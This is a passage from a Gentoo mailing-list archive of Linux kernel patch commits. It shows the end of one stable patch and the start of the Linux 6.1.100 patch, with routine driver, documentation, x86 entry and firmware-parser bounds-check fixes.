+@@ -1472,10 +1472,11 @@ static int davinci_mcasp_hw_rule_min_periodsize(
+ {
+ 	struct snd_interval *period_size = hw_param_interval(params,
+ 						SNDRV_PCM_HW_PARAM_PERIOD_SIZE);
++	u8 numevt = *((u8 *)rule->private);
+ 	struct snd_interval frames;
+ 
+ 	snd_interval_any(&frames);
+-	frames.min = 64;
++	frames.min = numevt;
+ 	frames.integer = 1;
+ 
+ 	return snd_interval_refine(period_size, &frames);
+@@ -1490,6 +1491,7 @@ static int davinci_mcasp_startup(struct snd_pcm_substream *substream,
+ 	u32 max_channels = 0;
+ 	int i, dir, ret;
+ 	int tdm_slots = mcasp->tdm_slots;
++	u8 *numevt;
+ 
+ 	/* Do not allow more then one stream per direction */
+ 	if (mcasp->substreams[substream->stream])
+@@ -1589,9 +1591,12 @@ static int davinci_mcasp_startup(struct snd_pcm_substream *substream,
+ 			return ret;
+ 	}
+ 
++	numevt = (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) ?
++			 &mcasp->txnumevt :
++			 &mcasp->rxnumevt;
+ 	snd_pcm_hw_rule_add(substream->runtime, 0,
+ 			    SNDRV_PCM_HW_PARAM_PERIOD_SIZE,
+-			    davinci_mcasp_hw_rule_min_periodsize, NULL,
++			    davinci_mcasp_hw_rule_min_periodsize, numevt,
+ 			    SNDRV_PCM_HW_PARAM_PERIOD_SIZE, -1);
+ 
+ 	return 0;
+diff --git a/sound/soc/ti/omap-hdmi.c b/sound/soc/ti/omap-hdmi.c
+index 0dc0475670ffe..554e7896e8053 100644
+--- a/sound/soc/ti/omap-hdmi.c
++++ b/sound/soc/ti/omap-hdmi.c
+@@ -354,11 +354,7 @@ static int omap_hdmi_audio_probe(struct platform_device *pdev)
+ 	if (!card)
+ 		return -ENOMEM;
+ 
+-	card->name = devm_kasprintf(dev, GFP_KERNEL,
+-				    "HDMI %s", dev_name(ad->dssdev));
+-	if (!card->name)
+-		return -ENOMEM;
+-
++	card->name = "HDMI";
+ 	card->owner = THIS_MODULE;
+ 	card->dai_link =
+ 		devm_kzalloc(dev, sizeof(*(card->dai_link)), GFP_KERNEL);
+diff --git a/tools/power/cpupower/utils/helpers/amd.c b/tools/power/cpupower/utils/helpers/amd.c
+index c519cc89c97f4..0a56e22240fc8 100644
+--- a/tools/power/cpupower/utils/helpers/amd.c
++++ b/tools/power/cpupower/utils/helpers/amd.c
+@@ -41,6 +41,16 @@ union core_pstate {
+ 		unsigned res1:31;
+ 		unsigned en:1;
+ 	} pstatedef;
++	/* since fam 1Ah: */
++	struct {
++		unsigned fid:12;
++		unsigned res1:2;
++		unsigned vid:8;
++		unsigned iddval:8;
++		unsigned idddiv:2;
++		unsigned res2:31;
++		unsigned en:1;
++	} pstatedef2;
+ 	unsigned long long val;
+ };
+ 
+@@ -48,6 +58,10 @@ static int get_did(union core_pstate pstate)
+ {
+ 	int t;
+ 
++	/* Fam 1Ah onward do not use did */
++	if (cpupower_cpu_info.family >= 0x1A)
++		return 0;
++
+ 	if (cpupower_cpu_info.caps & CPUPOWER_CAP_AMD_PSTATEDEF)
+ 		t = pstate.pstatedef.did;
+ 	else if (cpupower_cpu_info.family == 0x12)
+@@ -61,12 +75,18 @@ static int get_did(union core_pstate pstate)
+ static int get_cof(union core_pstate pstate)
+ {
+ 	int t;
+-	int fid, did, cof;
++	int fid, did, cof = 0;
+ 
+ 	did = get_did(pstate);
+ 	if (cpupower_cpu_info.caps & CPUPOWER_CAP_AMD_PSTATEDEF) {
+-		fid = pstate.pstatedef.fid;
+-		cof = 200 * fid / did;
++		if (cpupower_cpu_info.family >= 0x1A) {
++			fid = pstate.pstatedef2.fid;
++			if (fid > 0x0f)
++				cof = (fid * 5);
++		} else {
++			fid = pstate.pstatedef.fid;
++			cof = 200 * fid / did;
++		}
+ 	} else {
+ 		t = 0x10;
+ 		fid = pstate.pstate.fid;
+diff --git a/tools/testing/selftests/futex/functional/Makefile b/tools/testing/selftests/futex/functional/Makefile
+index a392d0917b4e5..994fa3468f170 100644
+--- a/tools/testing/selftests/futex/functional/Makefile
++++ b/tools/testing/selftests/futex/functional/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ INCLUDES := -I../include -I../../ $(KHDR_INCLUDES)
+-CFLAGS := $(CFLAGS) -g -O2 -Wall -D_GNU_SOURCE -pthread $(INCLUDES) $(KHDR_INCLUDES)
++CFLAGS := $(CFLAGS) -g -O2 -Wall -D_GNU_SOURCE= -pthread $(INCLUDES) $(KHDR_INCLUDES)
+ LDLIBS := -lpthread -lrt
+ 
+ LOCAL_HDRS := \
+diff --git a/tools/testing/selftests/openat2/openat2_test.c b/tools/testing/selftests/openat2/openat2_test.c
+index 7fb902099de45..f9d2b0ec77564 100644
+--- a/tools/testing/selftests/openat2/openat2_test.c
++++ b/tools/testing/selftests/openat2/openat2_test.c
+@@ -5,6 +5,7 @@
+  */
+ 
+ #define _GNU_SOURCE
++#define __SANE_USERSPACE_TYPES__ // Use ll64
+ #include <fcntl.h>
+ #include <sched.h>
+ #include <sys/stat.h>
+diff --git a/tools/testing/selftests/vDSO/parse_vdso.c b/tools/testing/selftests/vDSO/parse_vdso.c
+index 413f75620a35b..4ae417372e9eb 100644
+--- a/tools/testing/selftests/vDSO/parse_vdso.c
++++ b/tools/testing/selftests/vDSO/parse_vdso.c
+@@ -55,14 +55,20 @@ static struct vdso_info
+ 	ELF(Verdef) *verdef;
+ } vdso_info;
+ 
+-/* Straight from the ELF specification. */
+-static unsigned long elf_hash(const unsigned char *name)
++/*
++ * Straight from the ELF specification...and then tweaked slightly, in order to
++ * avoid a few clang warnings.
++ */
++static unsigned long elf_hash(const char *name)
+ {
+ 	unsigned long h = 0, g;
+-	while (*name)
++	const unsigned char *uch_name = (const unsigned char *)name;
++
++	while (*uch_name)
+ 	{
+-		h = (h << 4) + *name++;
+-		if (g = h & 0xf0000000)
++		h = (h << 4) + *uch_name++;
++		g = h & 0xf0000000;
++		if (g)
+ 			h ^= g >> 24;
+ 		h &= ~g;
+ 	}
+diff --git a/tools/testing/selftests/vDSO/vdso_standalone_test_x86.c b/tools/testing/selftests/vDSO/vdso_standalone_test_x86.c
+index 8a44ff973ee17..27f6fdf119691 100644
+--- a/tools/testing/selftests/vDSO/vdso_standalone_test_x86.c
++++ b/tools/testing/selftests/vDSO/vdso_standalone_test_x86.c
+@@ -18,7 +18,7 @@
+ 
+ #include "parse_vdso.h"
+ 
+-/* We need a libc functions... */
++/* We need some libc functions... */
+ int strcmp(const char *a, const char *b)
+ {
+ 	/* This implementation is buggy: it never returns -1. */
+@@ -34,6 +34,20 @@ int strcmp(const char *a, const char *b)
+ 	return 0;
+ }
+ 
++/*
++ * The clang build needs this, although gcc does not.
++ * Stolen from lib/string.c.
++ */
++void *memcpy(void *dest, const void *src, size_t count)
++{
++	char *tmp = dest;
++	const char *s = src;
++
++	while (count--)
++		*tmp++ = *s++;
++	return dest;
++}
++
+ /* ...and two syscalls.  This is x86-specific. */
+ static inline long x86_syscall3(long nr, long a0, long a1, long a2)
+ {
+@@ -70,7 +84,7 @@ void to_base10(char *lastdig, time_t n)
+ 	}
+ }
+ 
+-__attribute__((externally_visible)) void c_main(void **stack)
++void c_main(void **stack)
+ {
+ 	/* Parse the stack */
+ 	long argc = (long)*stack;


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-07-18 12:15 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-07-18 12:15 UTC (permalink / raw
  To: gentoo-commits

commit:     4910d4b94b7c2762c4408285599268c9899da415
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jul 18 12:15:41 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jul 18 12:15:41 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=4910d4b9

Linux patch 6.1.100

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1099_linux-6.1.100.patch | 3692 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3696 insertions(+)

diff --git a/0000_README b/0000_README
index 6e536b9a..2650897a 100644
--- a/0000_README
+++ b/0000_README
@@ -439,6 +439,10 @@ Patch:  1098_linux-6.1.99.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.99
 
+Patch:  1099_linux-6.1.100.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.100
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1099_linux-6.1.100.patch b/1099_linux-6.1.100.patch
new file mode 100644
index 00000000..594ab69b
--- /dev/null
+++ b/1099_linux-6.1.100.patch
@@ -0,0 +1,3692 @@
+diff --git a/Documentation/admin-guide/cifs/usage.rst b/Documentation/admin-guide/cifs/usage.rst
+index 3766bf8a1c20e..a50047cf95ca2 100644
+--- a/Documentation/admin-guide/cifs/usage.rst
++++ b/Documentation/admin-guide/cifs/usage.rst
+@@ -722,40 +722,26 @@ Configuration pseudo-files:
+ ======================= =======================================================
+ SecurityFlags		Flags which control security negotiation and
+ 			also packet signing. Authentication (may/must)
+-			flags (e.g. for NTLM and/or NTLMv2) may be combined with
++			flags (e.g. for NTLMv2) may be combined with
+ 			the signing flags.  Specifying two different password
+ 			hashing mechanisms (as "must use") on the other hand
+ 			does not make much sense. Default flags are::
+ 
+-				0x07007
+-
+-			(NTLM, NTLMv2 and packet signing allowed).  The maximum
+-			allowable flags if you want to allow mounts to servers
+-			using weaker password hashes is 0x37037 (lanman,
+-			plaintext, ntlm, ntlmv2, signing allowed).  Some
+-			SecurityFlags require the corresponding menuconfig
+-			options to be enabled.  Enabling plaintext
+-			authentication currently requires also enabling
+-			lanman authentication in the security flags
+-			because the cifs module only supports sending
+-			laintext passwords using the older lanman dialect
+-			form of the session setup SMB.  (e.g. for authentication
+-			using plain text passwords, set the SecurityFlags
+-			to 0x30030)::
++				0x00C5
++
++			(NTLMv2 and packet signing allowed).  Some SecurityFlags
++			may require enabling a corresponding menuconfig option.
+ 
+ 			  may use packet signing			0x00001
+ 			  must use packet signing			0x01001
+-			  may use NTLM (most common password hash)	0x00002
+-			  must use NTLM					0x02002
+ 			  may use NTLMv2				0x00004
+ 			  must use NTLMv2				0x04004
+-			  may use Kerberos security			0x00008
+-			  must use Kerberos				0x08008
+-			  may use lanman (weak) password hash		0x00010
+-			  must use lanman password hash			0x10010
+-			  may use plaintext passwords			0x00020
+-			  must use plaintext passwords			0x20020
+-			  (reserved for future packet encryption)	0x00040
++			  may use Kerberos security (krb5)		0x00008
++			  must use Kerberos                             0x08008
++			  may use NTLMSSP               		0x00080
++			  must use NTLMSSP           			0x80080
++			  seal (packet encryption)			0x00040
++			  must seal (not implemented yet)               0x40040
+ 
+ cifsFYI			If set to non-zero value, additional debug information
+ 			will be logged to the system error log.  This field
+diff --git a/Makefile b/Makefile
+index c12da8fcb089b..54099eefe18ca 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 99
++SUBLEVEL = 100
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/mach-davinci/pm.c b/arch/arm/mach-davinci/pm.c
+index 8aa39db095d76..2c5155bd376ba 100644
+--- a/arch/arm/mach-davinci/pm.c
++++ b/arch/arm/mach-davinci/pm.c
+@@ -61,7 +61,7 @@ static void davinci_pm_suspend(void)
+ 
+ 	/* Configure sleep count in deep sleep register */
+ 	val = __raw_readl(pm_config.deepsleep_reg);
+-	val &= ~DEEPSLEEP_SLEEPCOUNT_MASK,
++	val &= ~DEEPSLEEP_SLEEPCOUNT_MASK;
+ 	val |= pm_config.sleepcount;
+ 	__raw_writel(val, pm_config.deepsleep_reg);
+ 
+diff --git a/arch/s390/include/asm/processor.h b/arch/s390/include/asm/processor.h
+index c907f747d2a04..26861b09293f1 100644
+--- a/arch/s390/include/asm/processor.h
++++ b/arch/s390/include/asm/processor.h
+@@ -250,8 +250,8 @@ static inline void __load_psw(psw_t psw)
+  */
+ static __always_inline void __load_psw_mask(unsigned long mask)
+ {
++	psw_t psw __uninitialized;
+ 	unsigned long addr;
+-	psw_t psw;
+ 
+ 	psw.mask = mask;
+ 
+diff --git a/arch/x86/entry/entry_64.S b/arch/x86/entry/entry_64.S
+index 6624806e6904b..a114338380a6f 100644
+--- a/arch/x86/entry/entry_64.S
++++ b/arch/x86/entry/entry_64.S
+@@ -167,22 +167,9 @@ SYM_INNER_LABEL(entry_SYSCALL_64_after_hwframe, SYM_L_GLOBAL)
+ 	jne	swapgs_restore_regs_and_return_to_usermode
+ 
+ 	/*
+-	 * SYSCALL clears RF when it saves RFLAGS in R11 and SYSRET cannot
+-	 * restore RF properly. If the slowpath sets it for whatever reason, we
+-	 * need to restore it correctly.
+-	 *
+-	 * SYSRET can restore TF, but unlike IRET, restoring TF results in a
+-	 * trap from userspace immediately after SYSRET.  This would cause an
+-	 * infinite loop whenever #DB happens with register state that satisfies
+-	 * the opportunistic SYSRET conditions.  For example, single-stepping
+-	 * this user code:
+-	 *
+-	 *           movq	$stuck_here, %rcx
+-	 *           pushfq
+-	 *           popq %r11
+-	 *   stuck_here:
+-	 *
+-	 * would never get past 'stuck_here'.
++	 * SYSRET cannot restore RF.  It can restore TF, but unlike IRET,
++	 * restoring TF results in a trap from userspace immediately after
++	 * SYSRET.
+ 	 */
+ 	testq	$(X86_EFLAGS_RF|X86_EFLAGS_TF), %r11
+ 	jnz	swapgs_restore_regs_and_return_to_usermode
+diff --git a/arch/x86/entry/entry_64_compat.S b/arch/x86/entry/entry_64_compat.S
+index b14b8cd85eb23..74a2f418e6745 100644
+--- a/arch/x86/entry/entry_64_compat.S
++++ b/arch/x86/entry/entry_64_compat.S
+@@ -90,10 +90,6 @@ SYM_INNER_LABEL(entry_SYSENTER_compat_after_hwframe, SYM_L_GLOBAL)
+ 
+ 	cld
+ 
+-	IBRS_ENTER
+-	UNTRAIN_RET
+-	CLEAR_BRANCH_HISTORY
+-
+ 	/*
+ 	 * SYSENTER doesn't filter flags, so we need to clear NT and AC
+ 	 * ourselves.  To save a few cycles, we can check whether
+@@ -117,6 +113,16 @@ SYM_INNER_LABEL(entry_SYSENTER_compat_after_hwframe, SYM_L_GLOBAL)
+ 	jnz	.Lsysenter_fix_flags
+ .Lsysenter_flags_fixed:
+ 
++	/*
++	 * CPU bugs mitigations mechanisms can call other functions. They
++	 * should be invoked after making sure TF is cleared because
++	 * single-step is ignored only for instructions inside the
++	 * entry_SYSENTER_compat function.
++	 */
++	IBRS_ENTER
++	UNTRAIN_RET
++	CLEAR_BRANCH_HISTORY
++
+ 	movq	%rsp, %rdi
+ 	call	do_SYSENTER_32
+ 	/* XEN PV guests always use IRET path */
+diff --git a/arch/x86/lib/retpoline.S b/arch/x86/lib/retpoline.S
+index 055955c9bfcb7..7880e2a7ec6ad 100644
+--- a/arch/x86/lib/retpoline.S
++++ b/arch/x86/lib/retpoline.S
+@@ -107,6 +107,7 @@ __EXPORT_THUNK(srso_alias_untrain_ret)
+ /* dummy definition for alternatives */
+ SYM_START(srso_alias_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
+ 	ANNOTATE_UNRET_SAFE
++	ANNOTATE_NOENDBR
+ 	ret
+ 	int3
+ SYM_FUNC_END(srso_alias_untrain_ret)
+@@ -261,7 +262,6 @@ SYM_CODE_START(__x86_return_thunk)
+ 	UNWIND_HINT_FUNC
+ 	ANNOTATE_NOENDBR
+ 	ANNOTATE_UNRET_SAFE
+-	ANNOTATE_NOENDBR
+ 	ret
+ 	int3
+ SYM_CODE_END(__x86_return_thunk)
+diff --git a/drivers/acpi/processor_idle.c b/drivers/acpi/processor_idle.c
+index 6f613eef28879..18f4334a96919 100644
+--- a/drivers/acpi/processor_idle.c
++++ b/drivers/acpi/processor_idle.c
+@@ -16,7 +16,6 @@
+ #include <linux/acpi.h>
+ #include <linux/dmi.h>
+ #include <linux/sched.h>       /* need_resched() */
+-#include <linux/sort.h>
+ #include <linux/tick.h>
+ #include <linux/cpuidle.h>
+ #include <linux/cpu.h>
+@@ -388,25 +387,24 @@ static void acpi_processor_power_verify_c3(struct acpi_processor *pr,
+ 	return;
+ }
+ 
+-static int acpi_cst_latency_cmp(const void *a, const void *b)
++static void acpi_cst_latency_sort(struct acpi_processor_cx *states, size_t length)
+ {
+-	const struct acpi_processor_cx *x = a, *y = b;
++	int i, j, k;
+ 
+-	if (!(x->valid && y->valid))
+-		return 0;
+-	if (x->latency > y->latency)
+-		return 1;
+-	if (x->latency < y->latency)
+-		return -1;
+-	return 0;
+-}
+-static void acpi_cst_latency_swap(void *a, void *b, int n)
+-{
+-	struct acpi_processor_cx *x = a, *y = b;
++	for (i = 1; i < length; i++) {
++		if (!states[i].valid)
++			continue;
+ 
+-	if (!(x->valid && y->valid))
+-		return;
+-	swap(x->latency, y->latency);
++		for (j = i - 1, k = i; j >= 0; j--) {
++			if (!states[j].valid)
++				continue;
++
++			if (states[j].latency > states[k].latency)
++				swap(states[j].latency, states[k].latency);
++
++			k = j;
++		}
++	}
+ }
+ 
+ static int acpi_processor_power_verify(struct acpi_processor *pr)
+@@ -451,10 +449,7 @@ static int acpi_processor_power_verify(struct acpi_processor *pr)
+ 
+ 	if (buggy_latency) {
+ 		pr_notice("FW issue: working around C-state latencies out of order\n");
+-		sort(&pr->power.states[1], max_cstate,
+-		     sizeof(struct acpi_processor_cx),
+-		     acpi_cst_latency_cmp,
+-		     acpi_cst_latency_swap);
++		acpi_cst_latency_sort(&pr->power.states[1], max_cstate);
+ 	}
+ 
+ 	lapic_timer_propagate_broadcast(pr);
+diff --git a/drivers/char/hpet.c b/drivers/char/hpet.c
+index ee71376f174b7..3bc1d9243dbd0 100644
+--- a/drivers/char/hpet.c
++++ b/drivers/char/hpet.c
+@@ -289,8 +289,13 @@ hpet_read(struct file *file, char __user *buf, size_t count, loff_t * ppos)
+ 	if (!devp->hd_ireqfreq)
+ 		return -EIO;
+ 
+-	if (count < sizeof(unsigned long))
+-		return -EINVAL;
++	if (in_compat_syscall()) {
++		if (count < sizeof(compat_ulong_t))
++			return -EINVAL;
++	} else {
++		if (count < sizeof(unsigned long))
++			return -EINVAL;
++	}
+ 
+ 	add_wait_queue(&devp->hd_waitqueue, &wait);
+ 
+@@ -314,9 +319,16 @@ hpet_read(struct file *file, char __user *buf, size_t count, loff_t * ppos)
+ 		schedule();
+ 	}
+ 
+-	retval = put_user(data, (unsigned long __user *)buf);
+-	if (!retval)
+-		retval = sizeof(unsigned long);
++	if (in_compat_syscall()) {
++		retval = put_user(data, (compat_ulong_t __user *)buf);
++		if (!retval)
++			retval = sizeof(compat_ulong_t);
++	} else {
++		retval = put_user(data, (unsigned long __user *)buf);
++		if (!retval)
++			retval = sizeof(unsigned long);
++	}
++
+ out:
+ 	__set_current_state(TASK_RUNNING);
+ 	remove_wait_queue(&devp->hd_waitqueue, &wait);
+@@ -671,12 +683,24 @@ struct compat_hpet_info {
+ 	unsigned short hi_timer;
+ };
+ 
++/* 32-bit types would lead to different command codes which should be
++ * translated into 64-bit ones before passed to hpet_ioctl_common
++ */
++#define COMPAT_HPET_INFO       _IOR('h', 0x03, struct compat_hpet_info)
++#define COMPAT_HPET_IRQFREQ    _IOW('h', 0x6, compat_ulong_t)
++
+ static long
+ hpet_compat_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
+ {
+ 	struct hpet_info info;
+ 	int err;
+ 
++	if (cmd == COMPAT_HPET_INFO)
++		cmd = HPET_INFO;
++
++	if (cmd == COMPAT_HPET_IRQFREQ)
++		cmd = HPET_IRQFREQ;
++
+ 	mutex_lock(&hpet_mutex);
+ 	err = hpet_ioctl_common(file->private_data, cmd, arg, &info);
+ 	mutex_unlock(&hpet_mutex);
+diff --git a/drivers/firmware/cirrus/cs_dsp.c b/drivers/firmware/cirrus/cs_dsp.c
+index 64ed9d3f5d5d8..ee4c32669607f 100644
+--- a/drivers/firmware/cirrus/cs_dsp.c
++++ b/drivers/firmware/cirrus/cs_dsp.c
+@@ -1014,9 +1014,16 @@ struct cs_dsp_coeff_parsed_coeff {
+ 	int len;
+ };
+ 
+-static int cs_dsp_coeff_parse_string(int bytes, const u8 **pos, const u8 **str)
++static int cs_dsp_coeff_parse_string(int bytes, const u8 **pos, unsigned int avail,
++				     const u8 **str)
+ {
+-	int length;
++	int length, total_field_len;
++
++	/* String fields are at least one __le32 */
++	if (sizeof(__le32) > avail) {
++		*pos = NULL;
++		return 0;
++	}
+ 
+ 	switch (bytes) {
+ 	case 1:
+@@ -1029,10 +1036,16 @@ static int cs_dsp_coeff_parse_string(int bytes, const u8 **pos, const u8 **str)
+ 		return 0;
+ 	}
+ 
++	total_field_len = ((length + bytes) + 3) & ~0x03;
++	if ((unsigned int)total_field_len > avail) {
++		*pos = NULL;
++		return 0;
++	}
++
+ 	if (str)
+ 		*str = *pos + bytes;
+ 
+-	*pos += ((length + bytes) + 3) & ~0x03;
++	*pos += total_field_len;
+ 
+ 	return length;
+ }
+@@ -1057,71 +1070,134 @@ static int cs_dsp_coeff_parse_int(int bytes, const u8 **pos)
+ 	return val;
+ }
+ 
+-static inline void cs_dsp_coeff_parse_alg(struct cs_dsp *dsp, const u8 **data,
+-					  struct cs_dsp_coeff_parsed_alg *blk)
++static int cs_dsp_coeff_parse_alg(struct cs_dsp *dsp,
++				  const struct wmfw_region *region,
++				  struct cs_dsp_coeff_parsed_alg *blk)
+ {
+ 	const struct wmfw_adsp_alg_data *raw;
++	unsigned int data_len = le32_to_cpu(region->len);
++	unsigned int pos;
++	const u8 *tmp;
++
++	raw = (const struct wmfw_adsp_alg_data *)region->data;
+ 
+ 	switch (dsp->fw_ver) {
+ 	case 0:
+ 	case 1:
+-		raw = (const struct wmfw_adsp_alg_data *)*data;
+-		*data = raw->data;
++		if (sizeof(*raw) > data_len)
++			return -EOVERFLOW;
+ 
+ 		blk->id = le32_to_cpu(raw->id);
+ 		blk->name = raw->name;
+-		blk->name_len = strlen(raw->name);
++		blk->name_len = strnlen(raw->name, ARRAY_SIZE(raw->name));
+ 		blk->ncoeff = le32_to_cpu(raw->ncoeff);
++
++		pos = sizeof(*raw);
+ 		break;
+ 	default:
+-		blk->id = cs_dsp_coeff_parse_int(sizeof(raw->id), data);
+-		blk->name_len = cs_dsp_coeff_parse_string(sizeof(u8), data,
++		if (sizeof(raw->id) > data_len)
++			return -EOVERFLOW;
++
++		tmp = region->data;
++		blk->id = cs_dsp_coeff_parse_int(sizeof(raw->id), &tmp);
++		pos = tmp - region->data;
++
++		tmp = &region->data[pos];
++		blk->name_len = cs_dsp_coeff_parse_string(sizeof(u8), &tmp, data_len - pos,
+ 							  &blk->name);
+-		cs_dsp_coeff_parse_string(sizeof(u16), data, NULL);
+-		blk->ncoeff = cs_dsp_coeff_parse_int(sizeof(raw->ncoeff), data);
++		if (!tmp)
++			return -EOVERFLOW;
++
++		pos = tmp - region->data;
++		cs_dsp_coeff_parse_string(sizeof(u16), &tmp, data_len - pos, NULL);
++		if (!tmp)
++			return -EOVERFLOW;
++
++		pos = tmp - region->data;
++		if (sizeof(raw->ncoeff) > (data_len - pos))
++			return -EOVERFLOW;
++
++		blk->ncoeff = cs_dsp_coeff_parse_int(sizeof(raw->ncoeff), &tmp);
++		pos += sizeof(raw->ncoeff);
+ 		break;
+ 	}
+ 
++	if ((int)blk->ncoeff < 0)
++		return -EOVERFLOW;
++
+ 	cs_dsp_dbg(dsp, "Algorithm ID: %#x\n", blk->id);
+ 	cs_dsp_dbg(dsp, "Algorithm name: %.*s\n", blk->name_len, blk->name);
+ 	cs_dsp_dbg(dsp, "# of coefficient descriptors: %#x\n", blk->ncoeff);
++
++	return pos;
+ }
+ 
+-static inline void cs_dsp_coeff_parse_coeff(struct cs_dsp *dsp, const u8 **data,
+-					    struct cs_dsp_coeff_parsed_coeff *blk)
++static int cs_dsp_coeff_parse_coeff(struct cs_dsp *dsp,
++				    const struct wmfw_region *region,
++				    unsigned int pos,
++				    struct cs_dsp_coeff_parsed_coeff *blk)
+ {
+ 	const struct wmfw_adsp_coeff_data *raw;
++	unsigned int data_len = le32_to_cpu(region->len);
++	unsigned int blk_len, blk_end_pos;
+ 	const u8 *tmp;
+-	int length;
++
++	raw = (const struct wmfw_adsp_coeff_data *)&region->data[pos];
++	if (sizeof(raw->hdr) > (data_len - pos))
++		return -EOVERFLOW;
++
++	blk_len = le32_to_cpu(raw->hdr.size);
++	if (blk_len > S32_MAX)
++		return -EOVERFLOW;
++
++	if (blk_len > (data_len - pos - sizeof(raw->hdr)))
++		return -EOVERFLOW;
++
++	blk_end_pos = pos + sizeof(raw->hdr) + blk_len;
++
++	blk->offset = le16_to_cpu(raw->hdr.offset);
++	blk->mem_type = le16_to_cpu(raw->hdr.type);
+ 
+ 	switch (dsp->fw_ver) {
+ 	case 0:
+ 	case 1:
+-		raw = (const struct wmfw_adsp_coeff_data *)*data;
+-		*data = *data + sizeof(raw->hdr) + le32_to_cpu(raw->hdr.size);
++		if (sizeof(*raw) > (data_len - pos))
++			return -EOVERFLOW;
+ 
+-		blk->offset = le16_to_cpu(raw->hdr.offset);
+-		blk->mem_type = le16_to_cpu(raw->hdr.type);
+ 		blk->name = raw->name;
+-		blk->name_len = strlen(raw->name);
++		blk->name_len = strnlen(raw->name, ARRAY_SIZE(raw->name));
+ 		blk->ctl_type = le16_to_cpu(raw->ctl_type);
+ 		blk->flags = le16_to_cpu(raw->flags);
+ 		blk->len = le32_to_cpu(raw->len);
+ 		break;
+ 	default:
+-		tmp = *data;
+-		blk->offset = cs_dsp_coeff_parse_int(sizeof(raw->hdr.offset), &tmp);
+-		blk->mem_type = cs_dsp_coeff_parse_int(sizeof(raw->hdr.type), &tmp);
+-		length = cs_dsp_coeff_parse_int(sizeof(raw->hdr.size), &tmp);
+-		blk->name_len = cs_dsp_coeff_parse_string(sizeof(u8), &tmp,
++		pos += sizeof(raw->hdr);
++		tmp = &region->data[pos];
++		blk->name_len = cs_dsp_coeff_parse_string(sizeof(u8), &tmp, data_len - pos,
+ 							  &blk->name);
+-		cs_dsp_coeff_parse_string(sizeof(u8), &tmp, NULL);
+-		cs_dsp_coeff_parse_string(sizeof(u16), &tmp, NULL);
++		if (!tmp)
++			return -EOVERFLOW;
++
++		pos = tmp - region->data;
++		cs_dsp_coeff_parse_string(sizeof(u8), &tmp, data_len - pos, NULL);
++		if (!tmp)
++			return -EOVERFLOW;
++
++		pos = tmp - region->data;
++		cs_dsp_coeff_parse_string(sizeof(u16), &tmp, data_len - pos, NULL);
++		if (!tmp)
++			return -EOVERFLOW;
++
++		pos = tmp - region->data;
++		if (sizeof(raw->ctl_type) + sizeof(raw->flags) + sizeof(raw->len) >
++		    (data_len - pos))
++			return -EOVERFLOW;
++
+ 		blk->ctl_type = cs_dsp_coeff_parse_int(sizeof(raw->ctl_type), &tmp);
++		pos += sizeof(raw->ctl_type);
+ 		blk->flags = cs_dsp_coeff_parse_int(sizeof(raw->flags), &tmp);
++		pos += sizeof(raw->flags);
+ 		blk->len = cs_dsp_coeff_parse_int(sizeof(raw->len), &tmp);
+-
+-		*data = *data + sizeof(raw->hdr) + length;
+ 		break;
+ 	}
+ 
+@@ -1131,6 +1207,8 @@ static inline void cs_dsp_coeff_parse_coeff(struct cs_dsp *dsp, const u8 **data,
+ 	cs_dsp_dbg(dsp, "\tCoefficient flags: %#x\n", blk->flags);
+ 	cs_dsp_dbg(dsp, "\tALSA control type: %#x\n", blk->ctl_type);
+ 	cs_dsp_dbg(dsp, "\tALSA control len: %#x\n", blk->len);
++
++	return blk_end_pos;
+ }
+ 
+ static int cs_dsp_check_coeff_flags(struct cs_dsp *dsp,
+@@ -1154,12 +1232,16 @@ static int cs_dsp_parse_coeff(struct cs_dsp *dsp,
+ 	struct cs_dsp_alg_region alg_region = {};
+ 	struct cs_dsp_coeff_parsed_alg alg_blk;
+ 	struct cs_dsp_coeff_parsed_coeff coeff_blk;
+-	const u8 *data = region->data;
+-	int i, ret;
++	int i, pos, ret;
++
++	pos = cs_dsp_coeff_parse_alg(dsp, region, &alg_blk);
++	if (pos < 0)
++		return pos;
+ 
+-	cs_dsp_coeff_parse_alg(dsp, &data, &alg_blk);
+ 	for (i = 0; i < alg_blk.ncoeff; i++) {
+-		cs_dsp_coeff_parse_coeff(dsp, &data, &coeff_blk);
++		pos = cs_dsp_coeff_parse_coeff(dsp, region, pos, &coeff_blk);
++		if (pos < 0)
++			return pos;
+ 
+ 		switch (coeff_blk.ctl_type) {
+ 		case WMFW_CTL_TYPE_BYTES:
+@@ -1228,6 +1310,10 @@ static unsigned int cs_dsp_adsp1_parse_sizes(struct cs_dsp *dsp,
+ 	const struct wmfw_adsp1_sizes *adsp1_sizes;
+ 
+ 	adsp1_sizes = (void *)&firmware->data[pos];
++	if (sizeof(*adsp1_sizes) > firmware->size - pos) {
++		cs_dsp_err(dsp, "%s: file truncated\n", file);
++		return 0;
++	}
+ 
+ 	cs_dsp_dbg(dsp, "%s: %d DM, %d PM, %d ZM\n", file,
+ 		   le32_to_cpu(adsp1_sizes->dm), le32_to_cpu(adsp1_sizes->pm),
+@@ -1244,6 +1330,10 @@ static unsigned int cs_dsp_adsp2_parse_sizes(struct cs_dsp *dsp,
+ 	const struct wmfw_adsp2_sizes *adsp2_sizes;
+ 
